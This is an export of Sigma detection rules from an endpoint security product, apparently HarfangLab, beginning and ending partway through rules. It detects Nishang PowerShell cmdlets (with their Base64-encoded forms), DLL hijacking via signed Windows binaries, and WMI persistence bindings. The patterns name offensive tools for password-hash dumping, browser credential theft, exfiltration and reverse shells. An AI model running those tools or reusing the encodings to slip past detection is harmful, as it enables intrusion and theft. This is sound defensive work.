'cAdQBwAHQALQBCAGEAYwBrAGQAbwBvAHIA'\n - 'HAHUAcAB0AC0AQgBhAGMAawBkAG8AbwByA'\n # Invoke-ADSBackdoor, from Nishang\n - 'Invoke-ADSBackdoor'\n - 'SQBuAHYAbwBrAGUALQBBAEQAUwBCAGEAYwBrAGQAbwBvAHIA'\n - 
'kAbgB2AG8AawBlAC0AQQBEAFMAQgBhAGMAawBkAG8AbwByA'\n - 'JAG4AdgBvAGsAZQAtAEEARABTAEIAYQBjAGsAZABvAG8Acg'\n # Enabled-DuplicateToken, from Nishang\n - 'Enabled-DuplicateToken'\n - 'RQBuAGEAYgBsAGUAZAAtAEQAdQBwAGwAaQBjAGEAdABlAFQAbwBrAGUAbg'\n - 'UAbgBhAGIAbABlAGQALQBEAHUAcABsAGkAYwBhAHQAZQBUAG8AawBlAG4A'\n - 'FAG4AYQBiAGwAZQBkAC0ARAB1AHAAbABpAGMAYQB0AGUAVABvAGsAZQBuA'\n # Enabled-PsUaCme, from Nishang\n - 'Invoke-PsUaCme'\n - 'SQBuAHYAbwBrAGUALQBQAHMAVQBhAEMAbQBlA'\n - 'kAbgB2AG8AawBlAC0AUABzAFUAYQBDAG0AZQ'\n - 'JAG4AdgBvAGsAZQAtAFAAcwBVAGEAQwBtAGUA'\n # Remove-Update, from Nishang\n - 'Remove-Update'\n - 'UgBlAG0AbwB2AGUALQBVAHAAZABhAHQAZQ'\n - 'IAZQBtAG8AdgBlAC0AVQBwAGQAYQB0AGUA'\n - 'SAGUAbQBvAHYAZQAtAFUAcABkAGEAdABlA'\n # Get-LSASecret, from Nishang\n - 'Get-LSASecret'\n - 'RwBlAHQALQBMAFMAQQBTAGUAYwByAGUAdA'\n - 'cAZQB0AC0ATABTAEEAUwBlAGMAcgBlAHQA'\n - 'HAGUAdAAtAEwAUwBBAFMAZQBjAHIAZQB0A'\n # Get-PassHashes, from Nishang\n - 'Get-PassHashes'\n - 'RwBlAHQALQBQAGEAcwBzAEgAYQBzAGgAZQBzA'\n - 'cAZQB0AC0AUABhAHMAcwBIAGEAcwBoAGUAcw'\n - 'HAGUAdAAtAFAAYQBzAHMASABhAHMAaABlAHMA'\n # Show-TargetScreen, from Nishang\n - 'Show-TargetScreen'\n - 'UwBoAG8AdwAtAFQAYQByAGcAZQB0AFMAYwByAGUAZQBuA'\n - 'MAaABvAHcALQBUAGEAcgBnAGUAdABTAGMAcgBlAGUAbg'\n - 'TAGgAbwB3AC0AVABhAHIAZwBlAHQAUwBjAHIAZQBlAG4A'\n # Port-Scan, from Nishang\n - 'Port-Scan'\n - 'UABvAHIAdAAtAFMAYwBhAG4A'\n - 'AAbwByAHQALQBTAGMAYQBuA'\n - 'QAG8AcgB0AC0AUwBjAGEAbg'\n # Invoke-PoshRatHttp, from Nishang\n - 'Invoke-PoshRatHttp'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwBoAFIAYQB0AEgAdAB0AHAA'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAaABSAGEAdABIAHQAdABwA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwBzAGgAUgBhAHQASAB0AHQAcA'\n # Invoke-PoshRatHttps, from Nishang\n - 'Invoke-PoshRatHttps'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwBoAFIAYQB0AEgAdAB0AHAAcw'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAaABSAGEAdABIAHQAdABwAHMA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwBzAGgAUgBhAHQASAB0AHQAcABzA'\n # Invoke-PowerShellTCP, from Nishang\n - 'Invoke-PowerShellTCP'\n - 
'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAQwBQA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAEMAUA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABDAFAA'\n # Invoke-PowerShellWMI, from Nishang\n - 'Invoke-PowerShellWMI'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFcATQBJA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABXAE0ASQ'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVwBNAEkA'\n # Add-Exfiltration, from Nishang\n - 'Add-Exfiltration'\n - 'QQBkAGQALQBFAHgAZgBpAGwAdAByAGEAdABpAG8Abg'\n - 'EAZABkAC0ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4A'\n - 'BAGQAZAAtAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuA'\n # Add-Persistence, from Nishang\n - 'Add-Persistence'\n - 'QQBkAGQALQBQAGUAcgBzAGkAcwB0AGUAbgBjAGUA'\n - 'EAZABkAC0AUABlAHIAcwBpAHMAdABlAG4AYwBlA'\n - 'BAGQAZAAtAFAAZQByAHMAaQBzAHQAZQBuAGMAZQ'\n # Do-Exfiltration, from Nishang\n - 'Do-Exfiltration'\n - 'RABvAC0ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4A'\n - 'QAbwAtAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuA'\n - 'EAG8ALQBFAHgAZgBpAGwAdAByAGEAdABpAG8Abg'\n # Start-CaptureServer, from Nishang\n - 'Start-CaptureServer'\n - 'UwB0AGEAcgB0AC0AQwBhAHAAdAB1AHIAZQBTAGUAcgB2AGUAcg'\n - 'MAdABhAHIAdAAtAEMAYQBwAHQAdQByAGUAUwBlAHIAdgBlAHIA'\n - 'TAHQAYQByAHQALQBDAGEAcAB0AHUAcgBlAFMAZQByAHYAZQByA'\n # Get-ChromeDump, from Nishang\n - 'Get-ChromeDump'\n - 'RwBlAHQALQBDAGgAcgBvAG0AZQBEAHUAbQBwA'\n - 'cAZQB0AC0AQwBoAHIAbwBtAGUARAB1AG0AcA'\n - 'HAGUAdAAtAEMAaAByAG8AbQBlAEQAdQBtAHAA'\n # Get-ClipboardContents, from Nishang\n - 'Get-ClipboardContents'\n - 'RwBlAHQALQBDAGwAaQBwAGIAbwBhAHIAZABDAG8AbgB0AGUAbgB0AHMA'\n - 'cAZQB0AC0AQwBsAGkAcABiAG8AYQByAGQAQwBvAG4AdABlAG4AdABzA'\n - 'HAGUAdAAtAEMAbABpAHAAYgBvAGEAcgBkAEMAbwBuAHQAZQBuAHQAcw'\n # Invoke-Mimikittenz, from Nishang\n - 'Invoke-Mimikittenz'\n - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAaQB0AHQAZQBuAHoA'\n - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGkAdAB0AGUAbgB6A'\n - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBpAHQAdABlAG4Aeg'\n # Invoke-PowerShellIcmp, from Nishang\n - 'Invoke-PowerShellIcmp'\n - 
'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAEkAYwBtAHAA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABJAGMAbQBwA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwASQBjAG0AcA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c9719cbf-a239-494a-8715-09a29b52eac6",
"rule_name": "Malicious PowerShell Nishang Commandlets in Command-line",
"rule_description": "Detects various malicious cmdlets in PowerShell's command-line, generally associated with the Nishang framework.\nNishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security, penetration testing and red teaming.\nCmdlet names are matched both in clear text and in their Base64-encoded UTF-16LE forms (all three Base64 alignments), i.e. the encoding PowerShell's -EncodedCommand switch expects.\nIt is recommended to investigate the actions performed by attackers using the Nishang framework and to isolate infected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095",
"attack.t1115"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c97d7951-8f91-4019-99e7-40ca39857b16",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099072Z",
"creation_date": "2026-03-23T11:45:34.099074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099078Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://www.youtube.com/watch?v=MZ8fgAN2As8",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_svchost.yml",
"content": "title: DLL Hijacking via svchost.exe\nid: c97d7951-8f91-4019-99e7-40ca39857b16\ndescription: |\n Detects potential Windows DLL Hijacking via svchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://www.youtube.com/watch?v=MZ8fgAN2As8\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'svchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wlbsctrl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c97d7951-8f91-4019-99e7-40ca39857b16",
"rule_name": "DLL Hijacking via svchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via svchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nNote that the filter on the process image path excludes svchost.exe running from System32, SysWOW64 or WinSxS, so this rule only covers a relocated copy of svchost.exe loading wlbsctrl.dll; a wlbsctrl.dll picked up from a search-path directory by the genuine System32 svchost.exe is not alerted on.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c98155c7-83e2-4ac0-9a7b-47dfac1b3658",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589173Z",
"creation_date": "2026-03-23T11:45:34.589177Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cleanmgr.yml",
"content": "title: DLL Hijacking via CLEANMGR.DLL.exe\nid: c98155c7-83e2-4ac0-9a7b-47dfac1b3658\ndescription: |\n Detects potential Windows DLL Hijacking via CLEANMGR.DLL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CLEANMGR.DLL'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\propsys.dll'\n - '\\vssapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c98155c7-83e2-4ac0-9a7b-47dfac1b3658",
"rule_name": "DLL Hijacking via CLEANMGR.DLL.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CLEANMGR.DLL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c9839ae1-0d62-4732-97fd-a008d6dc892e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092111Z",
"creation_date": "2026-03-23T11:45:34.092113Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092118Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setspn.yml",
"content": "title: DLL Hijacking via setspn.exe\nid: c9839ae1-0d62-4732-97fd-a008d6dc892e\ndescription: |\n Detects potential Windows DLL Hijacking via setspn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setspn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c9839ae1-0d62-4732-97fd-a008d6dc892e",
"rule_name": "DLL Hijacking via setspn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via setspn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c98bdba9-660b-4c44-a474-31605f8cc11a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600821Z",
"creation_date": "2026-03-23T11:45:34.600824Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_usocoreworker.yml",
"content": "title: DLL Hijacking via usocoreworker.exe\nid: c98bdba9-660b-4c44-a474-31605f8cc11a\ndescription: |\n Detects potential Windows DLL Hijacking via usocoreworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'usocoreworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\UpdatePolicy.dll'\n - '\\winsqlite3.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c98bdba9-660b-4c44-a474-31605f8cc11a",
"rule_name": "DLL Hijacking via usocoreworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via usocoreworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca2b9141-1490-4f8f-ba50-dae6d1126219",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076167Z",
"creation_date": "2026-03-23T11:45:34.076169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076173Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_suspicious_binding.yml",
"content": "title: Suspicious WMI Binding\nid: ca2b9141-1490-4f8f-ba50-dae6d1126219\ndescription: |\n Detects the creation of suspicious WMI binding using a dangerous consumer.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n By default, two consumers class can be used maliciously:\n - ActiveScriptEventConsumer: execute the specified code or related script;\n - CommandLineEventConsumer: execute the specified command line.\n\n Consumer and filter parameter should be investigated to determine their legitimacy using for example the PowerShell cmdlet Get-WmiObject.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventType: 'WmiBindingEvent'\n Consumer|contains:\n - CommandLineEventConsumer\n - ActiveScriptEventConsumer\n Operation:\n - Created\n - Modified\n\n exclusion_hp:\n Filter:\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP USB-C * G* Insertion Event Filter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP USB-C&A Universal Dock G2 Insertion Event Filter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"HP Thunderbolt * G* Insertion Event Filter\"'\n Consumer:\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP USB-C * 
G* Consumer\"'\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP USB-C&A Universal Dock G2 Consumer\"'\n - '\\\\\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"HP Thunderbolt * G* Consumer\"'\n\n exclusion_dell:\n Filter:\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"DellCommandPowerManagerPolicyChangeEventFilter\"'\n - '\\\\\\\\.\\root\\subscription:__EventFilter.Name=\"DellCommandPowerManagerAlertEventFilter\"'\n Consumer:\n - '\\\\\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"DellCommandPowerManagerPolicyChangeEventConsumer\"'\n - '\\\\\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"DellCommandPowerManagerAlertEventConsumer\"'\n\n exclusion_default:\n Filter: '__EventFilter.Name=\"BVTFilter\"'\n Consumer: 'CommandLineEventConsumer.Name=\"BVTConsumer\"'\n\n exclusion_alsid:\n Filter: '__EventFilter.Name=?AlsidForAD-Launcher?'\n Consumer: 'ActiveScriptEventConsumer.Name=?AlsidForAD-Launcher?'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca2b9141-1490-4f8f-ba50-dae6d1126219",
"rule_name": "Suspicious WMI Binding",
